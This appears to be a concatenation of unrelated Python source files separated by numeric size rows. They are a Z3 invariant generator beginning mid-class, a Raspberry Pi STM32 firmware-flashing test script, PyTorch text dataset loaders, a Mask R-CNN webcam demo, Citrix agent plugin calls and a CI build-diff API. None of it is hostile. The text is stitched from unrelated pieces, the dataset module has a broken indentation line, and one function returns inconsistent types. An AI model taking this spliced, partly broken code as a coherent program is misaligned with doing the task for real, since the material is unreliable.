            def __init__(self, inputs, loopvars, params_without_types):
                super(InvGenLoopVisitor, self).__init__()
                self.invariants = {}
                self.invariant_names_to_loops = {} # dict from names to loops
                self.inputs = inputs
                self.loopvars = loopvars
                self.params_without_types = params_without_types
            def visit_Block(self, node):
                map(self.visit, node.body)
            def visit_WhileLoop(self, node):
                key = loop_key(node)
                invariant_name = "I_%s_%s" % (node.iter_var.name, key)
                self.invariants[key] = CallExp(VarNode(invariant_name),
                                               [VarNode(x) for x in self.params_without_types] + map(lambda x: VarNode(x), self.loopvars))
                self.invariant_names_to_loops[invariant_name] = node
                self.visit(node.body)
        visitor = InvGenLoopVisitor(self.inputs, self.get_loopvars(), self.get_params_without_types())
        visitor.visit(self.program)
        self.invariant_names_to_loops = visitor.invariant_names_to_loops
        return visitor.invariants
    def generate_invariant_funcs(self):
        """
        Generates the Z3 function for the invariant.
        """
        # These populate self.dependent_loopvars, self.loopvar_nesting and
        # self.output_nesting, which the template consumes below.
        self.find_dependent_loopvars()
        self.find_loopvar_nesting()
        self.find_output_nesting()
        from mako.template import Template
        inv_template = Template(filename="templates/z3/invariant.2.z3.mako", format_exceptions=True)
        ret = ""
        for invariant in self.invariant_names_to_loops.keys():
            #FIXME
            looplevel = 0
            node = self.invariant_names_to_loops[invariant]
            thiskey = loop_key(node)
            var = node.iter_var.name
            containing_loop_invs = self.get_containing_loop_invs(node)
            # we need to also know which loops this loop contains
            thisloopcontains = self.get_loops_contained_by(node)
            ret += inv_template.render(name=invariant,
                                       synthesized_invariant=self.get_synthesized_invariant_rhs(),
                                       looplevel=looplevel,
                                       output_nesting=self.output_nesting,
                                       containing_loop_invs=containing_loop_invs,
                                       parameters=self.get_params(),
                                       int_params=[x[0] for x in self.inputs if x[1]=="int"] + self.get_loopvars(),
                                       call_params=self.get_params_without_types(),
                                       outarray=self.get_out_array(),
                                       thisloopvar=var,
                                       thiskey=thiskey,
                                       thisloopcontains=thisloopcontains,
                                       loopvar=self.get_loopvars(),
                                       mins=self.loopvar_mins,
                                       maxs=self.loopvar_maxs,
                                       loopvar_nesting=self.loopvar_nesting,
                                       dependent_loopvars=self.dependent_loopvars)
        return ret
    def generate_postcon_func(self):
        """
        Generate the Z3 function for the postcondition.
        """
        from mako.template import Template
        pcon_template = Template(filename="templates/z3/postcondition.z3.mako")
        return pcon_template.render(parameters=self.get_params(),
                                    call_params=self.get_params_without_types(),
                                    loopvar_maxs=self.loopvar_maxs,
                                    loopvar_mins=self.loopvar_mins,
                                    outarray=self.get_out_array(),
                                    synthesized_invariant=self.get_synthesized_invariant_rhs(),
                                    loopvar=self.get_loopvars())
    def generate_constants(self):
        """
        Generates declarations for constants at the top-level of the script.
        """
        # One Int constant per loop variable, plus a primed (_p) copy, plus
        # every program input.
        all_params = [(x, "Int") for x in self.get_loopvars()]
        all_params += [(x+"_p", "Int") for x in self.get_loopvars()] + self.get_params()
        ret = "\n".join(["(declare-const %s %s)" % (x[0], x[1]) for x in all_params])
        return ret
    def get_params(self):
        """
        Returns a list of tuples of (name, type) for each input.
        """
        def is_arr(tp):
            # Sketch array types contain '[' in their type string.
            return "[" in tp[1]
        def convert_type(tp):
            # Map a Sketch scalar type to the corresponding Z3 sort.
            translation_dict = {"double":"Real", "int":"Int"}
            return translation_dict[tp.split()[0]]
        def convert_type_array(tp):
            # Build a nested (Array Int ...) sort, one level per dimension.
            scalar_tp = convert_type(tp.split("[")[0] + " ")
            ret = ""
            dim = len(tp.split("*"))
            for x in range(dim):
                ret += "(Array Int "
            ret += scalar_tp
            for x in range(dim):
                ret += ")"
            return ret
        def is_float(tp):
            return tp[1] == "double" or tp[1] == "float"
        arrs = filter(is_arr, self.inputs)
        non_arrs = filter(lambda x: not is_arr(x) and not is_float(x), self.inputs)
        floats = filter(is_float, self.inputs)
        return [(x[0], convert_type(x[1])) for x in floats] + [(x[0], "%s" % convert_type_array(x[1])) for x in arrs] + [(x[0], convert_type(x[1])) for x in non_arrs]
    def generate_signature(self):
        """
        Generate the signature for the main Z3 function.
        """
        # Opens two s-expressions; generate() appends the matching "))".
        return "(define-fun main () Bool\n(and \n"
    def generate_assumptions(self):
        """
        Generates the necessary assumptions.
        Right now, it generates, for a loopvar `i`, lower and upper bounds for `i` and `i_valp`.
        For arrays of the type `T[N]` it generates bounds for `N` such that it is greater than 3.
        """
        import asp.codegen.ast_tools
        import re
        ret = ""
        # Require each loop to span at least two iterations (max - min > 1).
        for x in self.get_loopvars():
            ret += "(assert (> (- %s %s) 1))" % (self.loopvar_maxs[x], self.loopvar_mins[x]) + "\n"
        return ret
    def get_params_without_types(self):
        """Return just the parameter names, in get_params() order."""
        return [x[0] for x in self.get_params()]
    def get_out_array(self):
        """Return the output arrays discovered in __init__."""
        return self.out_array
    def get_loopvars(self):
        """Return the loop variable names passed to the constructor."""
        return self.loopvars
    def get_synthesized_invariant_rhs(self):
        """Return the processed (Z3-syntax) invariant dict."""
        return self.synthesized_invariant
    def set_maxs_and_mins(self):
        """Populate loopvar_mins/loopvar_maxs with Z3 bound expressions."""
        for x in self.get_loopvars():
            maxfinder = generate_sketch.MaxFinder(x)
            maxfinder.visit(self.program)
            initfinder = generate_sketch.InitFinder(x)
            initfinder.visit(self.program)
            self.loopvar_mins[x] = ToZ3(initfinder.init,None,None).to_str()
            self.loopvar_maxs[x] = ToZ3(maxfinder.maximum,None,None).to_str()
    def replace_idx_vars(self, tree):
        """
        Given an expression, replace the loopvariables `x` with `x_to_check`.
        """
        import asp.codegen.ast_tools as ast_tools
        import grammar
        import copy
        # Work on a copy so the caller's tree is left untouched.
        tree_copy = copy.deepcopy(tree)
        class IdxReplacer(ast_tools.NodeTransformer):
            def __init__(self, loopvars):
                self.loopvars = loopvars
            def visit_VarNode(self, node):
                if node.name in self.loopvars:
                    return grammar.VarNode(node.name+"_to_check")
                else:
                    return node
        return IdxReplacer(self.get_loopvars()).visit(tree_copy)
    def find_dependent_loopvars(self):
        """
        For each output array, find which loopvars it depends on.
        """
        class DependenceFinder(ast_tools.NodeVisitor):
            def __init__(self, outputs, loopvars):
                super(DependenceFinder, self).__init__()
                self.outputs = outputs
                self.loopvars = loopvars
                self.dependences = {}
                for x in self.outputs:
                    self.dependences[x] = []
                # True while visiting the left-hand side of an assignment.
                self.in_lhs = False
                # Name of the array currently being indexed on the LHS.
                self.in_arr_access = None
            def visit_Block(self, node):
                map(self.visit, node.body)
            def visit_AssignExp(self, node):
                self.in_lhs = True
                self.visit(node.lval)
                self.in_lhs = False
                self.visit(node.rval)
            def visit_ArrExp(self, node):
                if self.in_lhs:
                    self.in_arr_access = node.name.name
                self.visit(node.loc)
                self.in_arr_access = None
            def visit_VarNode(self, node):
                if self.in_lhs and self.in_arr_access and node.name in self.loopvars:
                    self.dependences[self.in_arr_access].append(node.name)
        df = DependenceFinder(self.get_out_array(), self.loopvars)
        df.visit(self.program)
        logging.debug("Dependent loop vars: %s", df.dependences)
        self.dependent_loopvars = df.dependences
    def find_loopvar_nesting(self):
        """
        Find the nesting structure for the loops.
        Returns loop->[containing loops] dict.
        """
        self.loopvar_nesting = {}
        for lv in self.get_loopvars():
            self.loopvar_nesting[lv] = []
        for inv in self.invariant_names_to_loops.keys():
            node = self.invariant_names_to_loops[inv]
            thisnodevar = node.iter_var.name
            for x in self.get_containing_loop_invs(node):
                logging.debug("%s contained by %s", thisnodevar, x[1].iter_var.name)
                self.loopvar_nesting[thisnodevar].append(x[1].iter_var.name)
    def find_output_nesting(self):
        """
        Creates a structure to map from output->innermost loop.
        """
        class OutputNestFinder(ast_tools.NodeVisitor):
            def __init__(self, outputs):
                self.outputs = outputs
                self.cur_loopvar = None
                self.output_nesting = {}
            def visit_Block(self, node):
                map(self.visit, node.body)
            def visit_WhileLoop(self, node):
                # Track the innermost enclosing loop while descending.
                old_loopvar = self.cur_loopvar
                self.cur_loopvar = node.iter_var.name
                self.visit(node.body)
                self.cur_loopvar = old_loopvar
            def visit_AssignExp(self, node):
                if self.cur_loopvar and isinstance(node.lval, ArrExp):
                    self.output_nesting[node.lval.name.name] = self.cur_loopvar
        onf = OutputNestFinder(self.get_out_array())
        onf.visit(self.program)
        logging.debug("Output nesting: %s", onf.output_nesting)
        self.output_nesting = onf.output_nesting
    def get_containing_loop_invs(self, node):
        """
        Return a list of (invariant function name, node) that correspond to the loops
        outside a given loop.
        """
        class ContainingLoopVisitor(asp.codegen.ast_tools.NodeVisitor):
            def __init__(self):
                super(ContainingLoopVisitor, self).__init__()
                self.containing_loops = {}
                self.current_outerloops = []
            def visit_Block(self, node):
                # need to do this sequentially
                for n in node.body:
                    self.visit(n)
            def visit_WhileLoop(self, node):
                key = loop_key(node)
                invariant_name = "I_%s_%s" % (node.iter_var.name, key)
                # Snapshot the current stack of outer loops for this loop.
                self.containing_loops[invariant_name] = self.current_outerloops[:]
                self.current_outerloops.append((invariant_name, node))
                self.visit(node.body)
                self.current_outerloops.pop()
        # Compute the whole-program mapping once and cache it.
        if not self.containing_loop_invs:
            visitor = ContainingLoopVisitor()
            visitor.visit(self.program)
            self.containing_loop_invs = visitor.containing_loops
            logging.debug("Containing loops: %s", visitor.containing_loops)
        key = loop_key(node)
        invariant_name = "I_%s_%s" % (node.iter_var.name, key)
        return self.containing_loop_invs[invariant_name]
    def get_loops_contained_by(self, node):
        """
        Return a list of (invariant function name, node) that correspond to the
        loops contained by node.
        """
        class ContainedLoopVisitor(asp.codegen.ast_tools.NodeVisitor):
            def __init__(self):
                super(ContainedLoopVisitor, self).__init__()
                self.contained_loops = []
            def visit_Block(self, node):
                map(self.visit, node.body)
            def visit_WhileLoop(self, node):
                key = loop_key(node)
                invariant_name = "I_%s_%s" % (node.iter_var.name, key)
                self.contained_loops.append((invariant_name, node))
                self.visit(node.body)
        visitor = ContainedLoopVisitor()
        visitor.visit(node.body)
        return visitor.contained_loops
| 18,522 | 5,388 |
import os
import sys
import time
import spidev
import RPi.GPIO as GPIO
# BCM pin numbers wired to the payload board's RESET/BOOT0 lines and its
# "slave request" output.
PBOARD_RESET_PIN = 25
PBOARD_BOOT0_PIN = 12
SLAVE_REQ_PIN = 16
GPIO.setmode(GPIO.BCM)
# RESET/BOOT0 idle as inputs (high impedance); they are only driven while
# forcing the STM32 into or out of DFU mode.
GPIO.setup(PBOARD_RESET_PIN, GPIO.IN)
GPIO.setup(PBOARD_BOOT0_PIN, GPIO.IN)
GPIO.setup(SLAVE_REQ_PIN, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
# Set to True below if either firmware path looks like a .dfu image.
is_dfu = False
def enter_dfu():
    """Force the target STM32 into its bootloader (DFU) mode.

    The sequencing matters: BOOT0 must already be high when RESET is
    released.
    """
    # RESET LOW: Enter reset
    GPIO.setup(PBOARD_RESET_PIN, GPIO.OUT)
    GPIO.output(PBOARD_RESET_PIN, GPIO.LOW)
    time.sleep(0.05)
    # BOOT0 HIGH: Boot into DFU mode
    GPIO.setup(PBOARD_BOOT0_PIN, GPIO.OUT)
    GPIO.output(PBOARD_BOOT0_PIN, GPIO.HIGH)
    time.sleep(0.05)
    # Release RESET, BOOT0 still HIGH, STM32 now in DFU mode
    GPIO.setup(PBOARD_RESET_PIN, GPIO.IN)
    # Give the bootloader time to come up before any flashing tool talks to it.
    time.sleep(1)
def exit_dfu():
    """Reset the STM32 out of DFU so it boots the flashed firmware normally."""
    # Release BOOT0
    GPIO.setup(PBOARD_BOOT0_PIN, GPIO.IN)
    # Activate RESET
    GPIO.setup(PBOARD_RESET_PIN, GPIO.OUT)
    GPIO.output(PBOARD_RESET_PIN, GPIO.LOW)
    time.sleep(0.05)
    # Release RESET, BOOT0 is LOW, STM32 boots in normal mode
    GPIO.setup(PBOARD_RESET_PIN, GPIO.IN)
    time.sleep(0.2)
def flash_firmware(fw_path):
    """Flash `fw_path` onto the STM32 and hard-exit the script on failure.

    Uses dfu-util (USB DFU) when the module-level `is_dfu` flag is set,
    otherwise stm32flash over I2C bus 1 at address 0x3b.
    """
    # Print the firmware name several times so it stands out in the log.
    for x in range(5):
        print(f"----------------- {fw_path.split('/')[-1]} -----------------")
    enter_dfu()
    if is_dfu:
        # `>> 8` extracts the child's exit status from os.system()'s result.
        exit_code = os.system(f'sudo dfu-util --device ,0483:df11 -a 0 -D {fw_path}') >> 8
    else:
        exit_code = os.system(f'sudo stm32flash -w {fw_path} -a 0x3b /dev/i2c-1') >> 8
    exit_dfu()
    if exit_code != 0:
        for x in range(5):
            print("!!!!!!!!!!!!!!!!! TEST FLASH FAILED !!!!!!!!!!!!!!!!!")
        exit()
# Require both firmware images on the command line.
if(len(sys.argv) < 3):
    print (__file__ + ' payload_fw test_fw')
    exit()
os.system("clear")
# SPI bus 0, chip-select 0: the payload board's SPI slave interface.
pcard_spi = spidev.SpiDev(0, 0)
pcard_spi.max_speed_hz = 2000000
payload_fw_path = sys.argv[1]
test_fw_path = sys.argv[2]
# A .dfu extension on either image switches flashing to USB DFU mode.
if '.dfu' in payload_fw_path.lower() or '.dfu' in test_fw_path.lower():
    is_dfu = True
flash_firmware(test_fw_path)
# Sample the slave-request line for ~1s; the test firmware is expected to
# toggle it, so both levels should each show up more than 3 times out of 10.
req_result = []
for x in range(10):
    req_result.append(GPIO.input(SLAVE_REQ_PIN))
    time.sleep(0.1)
print(req_result)
if 0 not in req_result or 1 not in req_result or req_result.count(0) <= 3 or req_result.count(1) <= 3:
    for x in range(5):
        print("!!!!!!!!!!!!!!!!! SLAVE REQ ERROR !!!!!!!!!!!!!!!!!")
    exit()
# Wait for the operator before flashing the production payload firmware.
while 1:
    if len(input("Press enter to continue\n")) == 0:
        break;
flash_firmware(payload_fw_path)
# SPI protocol constants: every master frame starts with the magic byte.
SPI_MOSI_MAGIC = 0xde
SPI_MOSI_MSG_TYPE_INFO_REQUEST = 1
nop_spi_msg_template = [SPI_MOSI_MAGIC] + [0]*31
info_request_spi_msg_template = [SPI_MOSI_MAGIC, 0, SPI_MOSI_MSG_TYPE_INFO_REQUEST] + [0]*29
# Send an info request, then clock out a NOP frame to read back the reply.
this_msg = list(info_request_spi_msg_template)
pcard_spi.xfer(this_msg)
time.sleep(0.1)
response = pcard_spi.xfer(list(nop_spi_msg_template))
time.sleep(0.1)
print(response)
# 205 (0xcd) is the expected first response byte -- TODO confirm against the
# payload firmware's SPI protocol definition.
if response[0] != 205:
    for x in range(5):
        print("!!!!!!!!!!!!!!!!! WRONG RESPONSE !!!!!!!!!!!!!!!!!")
else:
    print("----------------- OK OK OK OK OK OK -----------------")
    print("----------------- OK OK OK OK OK OK -----------------")
"""
Text dataset iterators, as an extension of the PyTorch Dataset class.
class SimpleTextData(): reads a text file line by line up to a specified sequence length.
class TextDataSplit(): extends SimpleTextData() by splitting the data in train and val sets.
class TextDataUnPadded(): extends SimpleTextData() by also providing reversed sequences and a pad token.
class TextDataPadded(): extends TextDataUnPadded() by padding the text up to the specified sequence length.
"""
import os.path as osp
import sys
import numpy as np
import torch
from torch.utils.data import Dataset
# We include the path of the toplevel package in the system path so we can always use absolute imports within the package.
toplevel_path = osp.abspath(osp.join(osp.dirname(__file__), ".."))
if toplevel_path not in sys.path:
sys.path.insert(1, toplevel_path)
from util.error import InvalidLengthError # noqa: E402
__author__ = "Tom Pelsmaeker"
__copyright__ = "Copyright 2020"
class SimpleTextData(Dataset):
    """Dataset of text that reads the first N tokens from each line in the given textfile as data.

    Args:
        file(str): name of the file containing the text data already converted to indices.
        seq_len(int): maximum length of sequences. Longer sequences will be cut at this length.
            When 0, the cap is the token count of the character-longest line in the file.
    """

    def __init__(self, file, seq_len):
        if seq_len == 0:
            # `max(..., key=len)` compares by character length; we then count
            # that line's tokens.
            with open(file, "r") as handle:
                self._seq_len = len(max(handle, key=len).split())
        else:
            self._seq_len = seq_len
        # Bug fix: read via a context manager so the handle is closed
        # deterministically (the old code leaked the open file object).
        with open(file, "r") as handle:
            self._data = [
                line.split()[: self._seq_len] for line in handle if line != "\n"
            ]
        self._data_len = len(self._data)

    def __len__(self):
        return self._data_len

    def __getitem__(self, idx):
        # Bug fix: tokens come from str.split() and are therefore strings;
        # torch.LongTensor cannot be built from strings, so convert first.
        return torch.LongTensor([int(tok) for tok in self._data[idx]])
class TextDataSplit(SimpleTextData):
    """Dataset of text that allows a train/validation split from a single file. Extends SimpleTextData().

    Args:
        file(str): name of the file containing the text data already converted to indices.
        seq_len(int): maximum length of sequences. Longer sequences will be cut at this length.
        train(bool): True when training, False when testing.
    """

    def __init__(self, file, seq_len, train):
        super().__init__(file, seq_len)
        # Bug fix: the old code referenced `self.data` (no such attribute --
        # the base class stores `self._data`) and used numpy-style 2-D
        # slicing / `.shape` on what is a plain Python list, so it raised at
        # runtime. First 90% of lines = train split, remaining 10% = val.
        cutoff = int(len(self._data) * 0.9)
        if train:
            self._data = self._data[:cutoff]
        else:
            self._data = self._data[cutoff:]
        self._data_len = len(self._data)
class TextDataUnPadded(SimpleTextData):
    """
    Dataset of text that prepares sequences for padding, but does not pad them yet. Extends SimpleTextData().

    Args:
        file(str): name of the file containing the text data already converted to indices.
        seq_len(int): maximum length of sequences. shorter sequences will be padded to this length.
        pad_token(int): token that is appended to sentences shorter than seq_len.
    """

    def __init__(self, file, seq_len, pad_token):
        super().__init__(file, seq_len)
        # This class also provides reversed sequences that are needed in
        # certain generative model training.
        # Bug fix: read via a context manager so the second file handle is
        # closed deterministically (the old code leaked it).
        with open(file, "r") as handle:
            self._reverse_data = [
                line.split()[: self._seq_len][::-1]
                for line in handle
                if line != "\n"
            ]
        self._pad_token = pad_token

    def __getitem__(self, idx):
        return self._data[idx], self._reverse_data[idx], self._pad_token
class TextDataPadded(TextDataUnPadded):
    """
    Dataset of text that pads sequences up to the specified sequence length. Extends TextDataUnPadded().

    Args:
        file(str): name of the file containing the text data already converted to indices.
        seq_len(int): maximum length of sequences. shorter sequences will be padded to this length.
        pad_token(int): token that is appended to sentences shorter than seq_len.
    """

    def __init__(self, file, seq_len, pad_token):
        super().__init__(file, seq_len, pad_token)
        # Record the true (unpadded) length of every sequence, then pad both
        # the forward and reversed token lists out to the fixed length.
        lengths = [len(tokens) for tokens in self._data]
        padded = [
            tokens + [pad_token] * (self._seq_len - len(tokens))
            for tokens in self._data
        ]
        rev_padded = [
            tokens + [pad_token] * (self._seq_len - len(tokens))
            for tokens in self._reverse_data
        ]
        self._seq_lens = torch.LongTensor(lengths)
        self._data = torch.from_numpy(np.array(padded, dtype=np.int64))
        self._reverse_data = torch.from_numpy(np.array(rev_padded, dtype=np.int64))
        # Mask is 1.0 over real tokens, 0.0 over padding positions.
        self._mask = 1.0 - (self._data == pad_token).float()

    def __getitem__(self, idx):
        return (
            self._data[idx],
            self._seq_lens[idx],
            self._mask[idx],
            self._reverse_data[idx],
        )
def sort_collate(batch):
    """Custom collate_fn for DataLoaders, sorts data based on sequence lengths.

    Note that it is assumed that the variable on which to sort will be in the second position of the input tuples.

    Args:
        batch(list of tuples): a batch of data provided by a DataLoader given a Dataset, i.e a list of length batch_size
            of tuples, where each tuple contains the variables of the DataSet at a single index.

    Returns:
        list of tensors: one tensor of length batch_size per variable in the DataSet, sorted
        (descending) by the second variable, which is assumed to hold length information.
        The list contains [data, lengths, ...].

    Raises:
        InvalidLengthError: if the input has less than two variables per index.
    """
    if len(batch[0]) < 2:
        raise InvalidLengthError(
            "Batch needs to contain at least data (batch[0]) and lengths (batch[1])."
        )
    # Transpose list-of-tuples into one stacked tensor per variable.
    stacked = [
        torch.stack([sample[i] for sample in batch])
        for i in range(len(batch[0]))
    ]
    # Sort every variable by descending length (the second tensor).
    _, order = torch.sort(stacked[1], descending=True)
    return [tensor[order] for tensor in stacked]
def sort_pad_collate(batch):
    """Custom collate_fn for DataLoaders, pads data and sorts based on sequence lengths.

    Works together with the TextDataUnPadded Dataset, which yields samples in
    the shape this function expects.

    Args:
        batch(list of tuples): a batch of data provided by a DataLoader given a Dataset, i.e a list of length batch_size
            of tuples, where each tuple contains (data_i, reversed_data_i, pad_token).

    Returns:
        list of tensors: one tensor of length batch_size per variable, sorted (descending) by
        sequence length. The list contains [data, lengths, mask, reversed data].

    Raises:
        InvalidLengthError: if the input does not have three variables per index.
    """
    if len(batch[0]) != 3:
        raise InvalidLengthError(
            "Batch needs to contain data (batch[0]), reverse_data (batch[1]) and pad_token (batch[2])."
        )
    # Transpose list-of-tuples into per-variable column lists.
    columns = [[sample[i] for sample in batch] for i in range(len(batch[0]))]
    # Pad forward and reversed sequences out to the longest one in the batch.
    lengths = torch.tensor([len(seq) for seq in columns[0]])
    longest = lengths.max().item()
    pad_token = columns[2][0]
    for seq in columns[0]:
        seq.extend([pad_token] * (longest - len(seq)))
    for seq in columns[1]:
        seq.extend([pad_token] * (longest - len(seq)))
    data = torch.from_numpy(np.array(columns[0], dtype=np.int64))
    reverse = torch.from_numpy(np.array(columns[1], dtype=np.int64))
    # Mask is 1.0 over real tokens, 0.0 over padding positions.
    mask = 1.0 - (data == pad_token).float()
    # Sort everything by descending sequence length.
    _, order = torch.sort(lengths, descending=True)
    return [tensor[order] for tensor in [data, lengths, mask, reverse]]
| 8,394 | 2,487 |
# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
import argparse
import cv2
from maskrcnn_benchmark.config import cfg
from predictor import COCODemo
import time
def main():
    """Run Mask R-CNN inference on webcam frames and display the overlays.

    Loops until the user presses Esc in the OpenCV window.
    """
    parser = argparse.ArgumentParser(description="PyTorch Object Detection Webcam Demo")
    parser.add_argument(
        "--config-file",
        default="../configs/caffe2/e2e_mask_rcnn_R_50_FPN_1x_caffe2.yaml",
        metavar="FILE",
        help="path to config file",
    )
    parser.add_argument(
        "--confidence-threshold",
        type=float,
        default=0.7,
        help="Minimum score for the prediction to be shown",
    )
    parser.add_argument(
        "--min-image-size",
        type=int,
        default=224,
        help="Smallest size of the image to feed to the model. "
        "Model was trained with 800, which gives best results",
    )
    parser.add_argument(
        "--show-mask-heatmaps",
        dest="show_mask_heatmaps",
        help="Show a heatmap probability for the top masks-per-dim masks",
        action="store_true",
    )
    parser.add_argument(
        "--masks-per-dim",
        type=int,
        default=2,
        help="Number of heatmaps per dimension to show",
    )
    # Any trailing KEY VALUE pairs are forwarded to cfg.merge_from_list below.
    parser.add_argument(
        "opts",
        help="Modify model config options using the command-line",
        default=None,
        nargs=argparse.REMAINDER,
    )
    args = parser.parse_args()
    # load config from file and command-line arguments
    cfg.merge_from_file(args.config_file)
    cfg.merge_from_list(args.opts)
    cfg.freeze()
    # prepare object that handles inference plus adds predictions on top of image
    coco_demo = COCODemo(
        cfg,
        confidence_threshold=args.confidence_threshold,
        show_mask_heatmaps=args.show_mask_heatmaps,
        masks_per_dim=args.masks_per_dim,
        min_image_size=args.min_image_size,
    )
    # Device index 0: the default system webcam.
    cam = cv2.VideoCapture(0)
    while True:
        start_time = time.time()
        ret_val, img = cam.read()
        composite = coco_demo.run_on_opencv_image(img)
        # Per-frame latency, including capture and rendering.
        print("Time: {:.2f} s / img".format(time.time() - start_time))
        cv2.imshow("COCO detections", composite)
        if cv2.waitKey(1) == 27:
            break  # esc to quit
    cv2.destroyAllWindows()
# Script entry point.
if __name__ == "__main__":
    main()
| 2,938 | 940 |
# Copyright 2017 Citrix Systems
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
def version(session, uuid, dom_id, timeout):
    """Invoke the agent plugin's 'version' call for the given domain."""
    return session.call_plugin('agent.py', 'version',
                               {'id': uuid, 'dom_id': dom_id,
                                'timeout': timeout})
def key_init(session, uuid, dom_id, timeout, pub=''):
    """Invoke the agent plugin's 'key_init' call, passing the public key material."""
    args = dict(id=uuid, dom_id=dom_id, timeout=timeout, pub=pub)
    return session.call_plugin('agent.py', 'key_init', args)
def agent_update(session, uuid, dom_id, timeout, url='', md5sum=''):
    """Invoke the agent plugin's 'agentupdate' call with the update URL and checksum."""
    args = dict(id=uuid, dom_id=dom_id, timeout=timeout,
                url=url, md5sum=md5sum)
    return session.call_plugin('agent.py', 'agentupdate', args)
def password(session, uuid, dom_id, timeout, enc_pass=''):
    """Invoke the agent plugin's 'password' call with the encrypted password."""
    return session.call_plugin('agent.py', 'password',
                               {'id': uuid, 'dom_id': dom_id,
                                'timeout': timeout, 'enc_pass': enc_pass})
def inject_file(session, uuid, dom_id, timeout, b64_path='', b64_contents=''):
    """Invoke the agent plugin's 'inject_file' call with base64 path and contents."""
    args = dict(id=uuid, dom_id=dom_id, timeout=timeout,
                b64_path=b64_path, b64_contents=b64_contents)
    return session.call_plugin('agent.py', 'inject_file', args)
def reset_network(session, uuid, dom_id, timeout):
    """Invoke the agent plugin's 'resetnetwork' call for the given domain."""
    return session.call_plugin('agent.py', 'resetnetwork',
                               {'id': uuid, 'dom_id': dom_id,
                                'timeout': timeout})
| 1,886 | 636 |
from __future__ import absolute_import
from collections import defaultdict
from flask_restful.reqparse import RequestParser
from itertools import groupby
from sqlalchemy.orm import contains_eager, joinedload, subqueryload_all
from uuid import UUID
from changes.api.base import APIView
from changes.api.serializer.models.testcase import TestCaseWithOriginCrumbler
from changes.config import db
from changes.constants import Result, Status
from changes.models import (
Build, BuildPriority, Source, Event, FailureReason, Job, TestCase,
BuildSeen, User
)
from changes.utils.originfinder import find_failure_origins
def find_changed_tests(current_build, previous_build, limit=25):
    """Diff the tests run by two builds.

    Returns a dict with the total number of added/removed tests and a list
    (capped at `limit`) of ('+'|'-', TestCase) changes: '+' for tests only in
    `current_build`, '-' for tests only in `previous_build`.

    NOTE(review): the early exit below returns a bare list while every other
    path returns a dict -- callers must handle both shapes; confirm before
    relying on the dict form.
    """
    current_job_ids = [j.id.hex for j in current_build.jobs]
    previous_job_ids = [j.id.hex for j in previous_build.jobs]
    if not (current_job_ids and previous_job_ids):
        return []
    # Hand-build one named bind parameter per job id for the IN clauses.
    current_job_clause = ', '.join(
        ':c_job_id_%s' % i for i in range(len(current_job_ids))
    )
    previous_job_clause = ', '.join(
        ':p_job_id_%s' % i for i in range(len(previous_job_ids))
    )
    params = {}
    for idx, job_id in enumerate(current_job_ids):
        params['c_job_id_%s' % idx] = job_id
    for idx, job_id in enumerate(previous_job_ids):
        params['p_job_id_%s' % idx] = job_id
    # find all tests that have appeared in one job but not the other
    # we have to build this query up manually as sqlalchemy doesnt support
    # the FULL OUTER JOIN clause
    query = """
        SELECT c.id AS c_id,
               p.id AS p_id
        FROM (
            SELECT label_sha, id
            FROM test
            WHERE job_id IN (%(current_job_clause)s)
        ) as c
        FULL OUTER JOIN (
            SELECT label_sha, id
            FROM test
            WHERE job_id IN (%(previous_job_clause)s)
        ) as p
        ON c.label_sha = p.label_sha
        WHERE (c.id IS NULL OR p.id IS NULL)
    """ % {
        'current_job_clause': current_job_clause,
        'previous_job_clause': previous_job_clause
    }
    total = db.session.query(
        'count'
    ).from_statement(
        'SELECT COUNT(*) FROM (%s) as a' % (query,)
    ).params(**params).scalar()
    if not total:
        return {
            'total': 0,
            'changes': [],
        }
    results = db.session.query(
        'c_id', 'p_id'
    ).from_statement(
        '%s LIMIT %d' % (query, limit)
    ).params(**params)
    # NOTE(review): `results` is iterated twice below; each iteration
    # re-executes the query -- confirm the result set is stable in between.
    all_test_ids = set()
    for c_id, p_id in results:
        if c_id:
            all_test_ids.add(c_id)
        else:
            all_test_ids.add(p_id)
    test_map = dict(
        (t.id, t) for t in TestCase.query.filter(
            TestCase.id.in_(all_test_ids),
        ).options(
            joinedload('job', innerjoin=True),
        )
    )
    diff = []
    for c_id, p_id in results:
        if p_id:
            diff.append(('-', test_map[UUID(p_id)]))
        else:
            diff.append(('+', test_map[UUID(c_id)]))
    return {
        'total': total,
        'changes': sorted(diff, key=lambda x: (x[1].package, x[1].name)),
    }
def get_failure_reasons(build):
    """Collect the serialized failure reasons recorded for `build`."""
    from changes.buildfailures import registry
    reason_rows = FailureReason.query.filter(
        FailureReason.build_id == build.id,
    )
    return [
        {
            'id': row.reason,
            'reason': registry[row.reason].get_html_label(build),
            'step_id': row.step_id,
            'job_id': row.job_id,
            'data': dict(row.data or {}),
        }
        for row in reason_rows
    ]
def get_parents_last_builds(build):
    """Return the most recent finished build for each parent revision of
    `build`, or an empty list when no parents can be determined.

    A patch has only one parent, while a revision can have more.
    """
    if build.source.patch:
        parents = [build.source.patch.parent_revision_sha]
    elif build.source.revision:
        parents = build.source.revision.parents
    else:
        # Bug fix: `parents` was left unbound when the source had neither a
        # patch nor a revision, raising UnboundLocalError below.
        parents = []
    if parents:
        parent_builds = list(Build.query.filter(
            Build.project == build.project,
            Build.status == Status.finished,
            Build.id != build.id,
            Source.patch_id == None,  # NOQA
        ).join(
            Source, Build.source_id == Source.id,
        ).options(
            contains_eager('source').joinedload('revision'),
        ).filter(
            Source.revision_sha.in_(parents)
        ).order_by(Build.date_created.desc()))
        if parent_builds:
            # This returns a list with the last build of each revision.
            return [
                list(builds)[0]
                for sha, builds in groupby(
                    parent_builds,
                    lambda rev: rev.source.revision_sha
                )
            ]
    return []
